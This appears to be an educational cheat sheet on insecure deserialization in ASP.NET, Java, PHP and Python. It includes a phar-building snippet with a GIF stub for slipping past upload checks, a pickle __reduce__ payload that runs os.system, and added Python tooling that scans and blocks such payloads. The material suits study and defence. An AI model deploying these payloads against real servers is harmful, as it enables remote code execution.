
Deserialization

  • ASP.NET Deserialization

    ViewState, Session state and similar fields usually carry serialized data that is MAC-validated (and optionally encrypted) with the machineKey (validationKey / decryptionKey) in web.config; whoever obtains that key can sign a payload the server will deserialize.

    • ysoserial.net

  • Java

    • Gadgets
      • CommonsCollections
    • Magic Method
      • toString (called whenever the object is stringified, e.g. by logging or string concatenation)
      • readObject (called by ObjectInputStream.readObject() for every object in the stream, on attacker-controlled data)

        import java.io.IOException;
        import java.io.ObjectInputStream;
        import java.io.Serializable;

        public class Cat implements Serializable {
            ...
            // invoked automatically during deserialization, before the caller ever sees the object
            private void readObject(ObjectInputStream in)
                    throws IOException, ClassNotFoundException {
                in.defaultReadObject();
                ...
            }
        }

      • finalize (called by the garbage collector when the object is collected, so it fires even if the cast after readObject() fails)
      • ...
    • ysoserial

  • PHP

    Note: since PHP 8.0 phar metadata is no longer unserialized automatically when an archive is touched through phar:// (it is only unserialized on an explicit Phar::getMetadata() call), so the phar:// trick below works on PHP < 8.0; unserialize() itself and the magic methods are unchanged.

    • Phar Format
      • stub
      • manifest (... serialized file meta-data, stored in serialize() format ...)
      • contents
      • signature (optional)
    • Magic Method
      • __destruct() (runs when the object is freed, so it fires even if nothing else touches the unserialized object)
      • __wakeup() (runs right after unserialize() rebuilds the object)
      • __call() (runs when an undefined method is called on the object)
      • __toString() (runs when the object is used as a string)
    • Phar Deserialization (phar://)

      Trigger: any filesystem function that accepts a phar:// path, e.g.
      • file_get_contents()
      • include()
      • file_exists()
      • getimagesize()
      • unlink()
      • file()
      • fopen()
      • is_dir()
      • ...
      • Create the phar with php --define phar.readonly=0 ${file} (phar.readonly defaults to On and blocks writing archives from a script)

        <?php
            // Any class works for the demo; a real payload uses a class (loaded by the target)
            // whose __destruct()/__wakeup() reaches a dangerous sink.
            class Cat {}
            $phar = new Phar("pharfile.phar");     // the Phar class requires a .phar name while writing; rename afterwards, phar:// does not care about the extension
            $phar->startBuffering();
            $phar->setStub("<?php __HALT_COMPILER(); ?>");
            $c = new Cat();
            $phar->setMetadata($c);                // serialize($c) is stored in the manifest and unserialized on phar:// access
            $phar->addFromString("meow.txt", "owo"); // an archive needs at least one file entry
            $phar->stopBuffering();
        ?>
        
    • POP Chain (Property-Oriented Programming: chaining magic methods of classes the application already loads so that unserialize() of attacker data ends in a dangerous sink)
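    Added example (not from the original page): a Python walker for the phar layout listed above (stub, manifest, contents, signature), plus a minimal writer used only to construct the sample, mirroring the PHP snippet's one-file archive with a serialized Cat in the metadata. All names (build_phar, parse_phar, phar_metadata_objects, SAMPLE) are my own and the sample bytes are constructed inline. It goes slightly beyond the page: it also checks the trailer hash and lists the object classes found in the metadata, which is the triage an upload filter or a forensic script wants.

```python
import hashlib
import re
import struct
import zlib

HALT = b"__HALT_COMPILER();"
HDR_SIGNATURE = 0x00010000            # global flag: a signature trailer follows the contents
SIG_ALGOS = {0x1: "md5", 0x2: "sha1", 0x4: "sha256", 0x8: "sha512"}


def build_phar(metadata, files, stub=b"<?php __HALT_COMPILER(); ?>\r\n"):
    """Minimal uncompressed phar writer. metadata must already be serialize() bytes;
    files is {name: bytes} and needs at least one entry (PHP rejects empty manifests)."""
    entries = contents = b""
    for name, data in files.items():
        nb = name.encode()
        entries += struct.pack("<I", len(nb)) + nb
        # uncompressed size, mtime, compressed size, crc32, flags (perm 0644), per-file metadata len
        entries += struct.pack("<IIIIII", len(data), 0, len(data),
                               zlib.crc32(data) & 0xFFFFFFFF, 0o644, 0)
        contents += data
    body = (struct.pack("<I", len(files))
            + b"\x11\x10"                            # API version 1.1.1 (big-endian nibbles)
            + struct.pack("<II", HDR_SIGNATURE, 0)   # global flags, alias length (no alias)
            + struct.pack("<I", len(metadata)) + metadata
            + entries)
    unsigned = stub + struct.pack("<I", len(body)) + body + contents
    # trailer: digest over everything before it, 4-byte type (2 = SHA1), magic "GBMB"
    return unsigned + hashlib.sha1(unsigned).digest() + struct.pack("<I", 2) + b"GBMB"


def parse_phar(blob):
    """Walk stub -> manifest -> contents -> signature of an uncompressed phar.
    Raises ValueError if blob is not one. Whole-archive gz/bz2 compression is not handled."""
    halt = blob.find(HALT)
    if halt < 0:
        raise ValueError("no __HALT_COMPILER(); token: not a phar")
    pos = halt + len(HALT)                # manifest starts after the token, " ?>" and a newline
    if blob[pos:pos + 3] == b" ?>":
        pos += 3
    if blob[pos:pos + 2] == b"\r\n":
        pos += 2
    elif blob[pos:pos + 1] == b"\n":
        pos += 1
    (mlen,) = struct.unpack_from("<I", blob, pos)
    m = blob[pos + 4:pos + 4 + mlen]
    if mlen < 10 or len(m) != mlen:
        raise ValueError("truncated manifest")
    count, = struct.unpack_from("<I", m, 0)
    ver = m[4:6]
    flags, alias_len = struct.unpack_from("<II", m, 6)
    off = 14
    alias, off = m[off:off + alias_len], off + alias_len
    (meta_len,) = struct.unpack_from("<I", m, off)
    off += 4
    metadata, off = m[off:off + meta_len], off + meta_len   # the serialize() blob PHP unserializes
    entries, data_off = [], pos + 4 + mlen                   # file contents follow the manifest
    for _ in range(count):
        (nlen,) = struct.unpack_from("<I", m, off)
        off += 4
        name, off = m[off:off + nlen].decode("utf-8", "replace"), off + nlen
        usize, mtime, csize, crc, fflags, fmeta_len = struct.unpack_from("<IIIIII", m, off)
        off += 24
        fmeta, off = m[off:off + fmeta_len], off + fmeta_len
        entries.append({"name": name, "size": usize, "crc32": crc, "flags": fflags,
                        "metadata": fmeta, "data": blob[data_off:data_off + csize]})
        data_off += csize
    result = {"stub": blob[:pos], "api_version": f"{ver[0] >> 4}.{ver[0] & 0xF}.{ver[1] >> 4}",
              "flags": flags, "alias": alias, "metadata": metadata, "entries": entries,
              "signature_ok": None}
    if flags & HDR_SIGNATURE:
        sig_type, magic = struct.unpack_from("<I4s", blob, len(blob) - 8)
        if magic != b"GBMB" or sig_type not in SIG_ALGOS:
            raise ValueError("bad signature trailer")
        dlen = hashlib.new(SIG_ALGOS[sig_type]).digest_size
        signed, digest = blob[:-8 - dlen], blob[-8 - dlen:-8]
        result["signature_ok"] = hashlib.new(SIG_ALGOS[sig_type], signed).digest() == digest
    return result


def phar_metadata_objects(blob):
    """Class names of serialized objects in the manifest metadata, i.e. what __wakeup()/
    __destruct() would fire for. Empty list if blob is not a phar (cheap upload triage)."""
    try:
        meta = parse_phar(blob)["metadata"]
    except ValueError:
        return []
    return [c.decode() for c in re.findall(rb'O:\d+:"([^"]+)"', meta)]


# Constructed sample: GIF magic in front of the stub (defeats magic-byte upload checks),
# metadata = serialize(new Cat()) for an empty class, one file entry as in the PHP snippet.
SAMPLE = build_phar(b'O:3:"Cat":0:{}', {"meow.txt": b"owo"},
                    stub=b"GIF89a<?php __HALT_COMPILER(); ?>\r\n")
```

    Two things the walker makes visible: phar:// locates the archive by the __HALT_COMPILER(); token, not by extension or magic bytes, so the GIF-prefixed sample parses exactly like pharfile.phar; and the default trailer is an unkeyed hash that anyone can recompute, so signature_ok only says "not corrupted", never "came from us" (only the OpenSSL signature type is keyed).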

  • Python

    • Magic Method
      • __reduce__()
    • pickle

      pickle.loads() drives a small stack-based virtual machine over the opcode stream; __reduce__ lets an object make the pickler emit a GLOBAL + REDUCE pair, i.e. "import this callable and call it with these args" on the loading side.

      import os
      import pickle
      import pickletools

      class Exploit(object):
          def __reduce__(self):
              # (callable, args): replayed as a call during loads()
              return (os.system, ('id', ))

      serialized = pickle.dumps(Exploit())   # nothing runs here; only the reduce tuple is recorded
      pickle.loads(serialized)               # os.system('id') executes on the loading side
      #pickletools.dis(serialized)            # shows the GLOBAL/REDUCE opcodes without running them
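      Added example (not from the original page): the same os.system gadget next to two defences, a static opcode scan with pickletools that lists the globals a pickle would import without executing it, and the allowlist Unpickler pattern from the Python docs that refuses the REDUCE before it can call anything. Function and class names (build_payload, referenced_globals, RestrictedUnpickler, is_safe, roundtrip_ok) and the allowlist contents are my own assumptions for the demo.

```python
import io
import os
import pickle
import pickletools


class Exploit:
    """Same gadget as the snippet above: unpickling it calls os.system("id")."""

    def __reduce__(self):
        return (os.system, ("id",))


def build_payload(protocol=pickle.DEFAULT_PROTOCOL):
    """dumps() only records the (callable, args) pair; nothing runs until loads()."""
    return pickle.dumps(Exploit(), protocol=protocol)


def referenced_globals(payload):
    """Static triage: the (module, name) pairs a pickle would import, read off the opcode
    stream with pickletools instead of executing it. Covers the old GLOBAL opcode
    (arg "module name") and protocol 4's STACK_GLOBAL (module and name are the two
    string opcodes pushed just before it). Note os.system pickles as posix/nt.system."""
    found, strings = [], []
    for op, arg, _pos in pickletools.genops(payload):
        if op.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif op.name == "STACK_GLOBAL":
            found.append((strings[-2], strings[-1]))
        elif isinstance(arg, str):
            strings.append(arg)
    return found


class RestrictedUnpickler(pickle.Unpickler):
    """Allowlist loader (the pattern from the pickle docs): every GLOBAL/STACK_GLOBAL
    resolves through find_class(), so refusing here stops REDUCE before it calls anything.
    The allowlist below is an assumption for the demo; a real one lists the app's own types."""
    ALLOWED = {("builtins", "range"), ("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(payload):
    return RestrictedUnpickler(io.BytesIO(payload)).load()


def is_safe(payload):
    """True if the allowlisted loader accepts the payload, False if it hit a forbidden global."""
    try:
        restricted_loads(payload)
        return True
    except pickle.UnpicklingError:
        return False


def roundtrip_ok(obj):
    """Plain data (dicts, lists, tuples, allowlisted types) still works through the restricted loader."""
    return restricted_loads(pickle.dumps(obj)) == obj
```

      The scan is cheap and side-effect free, so it suits log-time triage of captured pickles; the allowlist loader is what to put in the code path that must accept pickles at all. Neither replaces the real fix, which is not to unpickle untrusted input.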